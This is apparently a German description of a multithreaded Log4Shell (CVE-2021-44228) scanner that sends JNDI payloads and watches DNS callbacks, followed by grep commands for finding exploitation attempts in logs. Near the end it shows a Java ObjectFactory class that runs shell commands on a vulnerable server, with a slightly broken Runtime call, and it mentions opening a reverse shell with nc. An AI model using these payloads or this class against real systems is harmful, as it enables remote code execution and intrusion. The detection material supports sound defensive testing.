
Multithreaded-Python-Scanner, der Log4Shell (CVE-2021-44228) erkennt, indem er manipulierte HTTP-Anfragen mit JNDI-Payloads sendet und DNS-Callbacks überwacht, um verwundbare Hosts zu identifizieren.
Dieses Skript basiert auf takito1812/log4j-detect
Das in Python 3 entwickelte Skript „log4j-detect.py" ist dafür zuständig, zu erkennen, ob eine Liste von URLs anfällig für CVE-2021-44228 ist.
Dazu sendet es eine GET-Anfrage unter Verwendung von Threads (höhere Leistung) an jede der URLs in der angegebenen Liste. Die GET-Anfrage enthält eine Payload, die bei Erfolg eine DNS-Anfrage an Burp Collaborator / interactsh zurückgibt. Diese Payload wird in einem Testparameter und in den Headern „User-Agent" / „Referer" / „X-Forwarded-For" / „Authentication" gesendet. Wenn schließlich ein Host anfällig ist, erscheint eine Identifikationsnummer im Subdomain-Präfix der Burp-Collaborator-/interactsh-Payload und in der Ausgabe des Skripts, sodass bekannt ist, welcher Host über DNS geantwortet hat.
Es sollte beachtet werden, dass dieses Skript nur die DNS-Erkennung der Schwachstelle übernimmt und keine Remote-Befehlsausführung testet.
python3 log4j-detect.py -s <burpCollaborator/interactsh...> [-u [urls]] [-f [urlFileList]] [-t THREADS] [-p PROXY] [--urllib3-warnings|--no-urllib3-warnings]

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[
s]?|rmi)://[^\n]+'
Um zu prüfen, ob jemand versucht hat, eine Verbindung über einen LDAP-Server herzustellen
Hier ist ein Beispielcode, den Sie starten können, um zu testen, ob Ihr Server kompromittiert werden kann (Wenn es sich um eine Windows-Shell handelt, können Sie einfach die PowerShell-Syntax verwenden)
public class ExportObject implements javax.naming.spi.ObjectFactory {
public ExportObject() {
try {
java.lang.getRuntime().exec("touch ~/pwned");
java.lang.getRuntime().exec("ls ~");
} catch (Exception e) {
e.printStackTrace();
}
}
}
So etwas könnte Ihnen ermöglichen, mit dem Befehl nc eine Reverse-Shell zu erstellen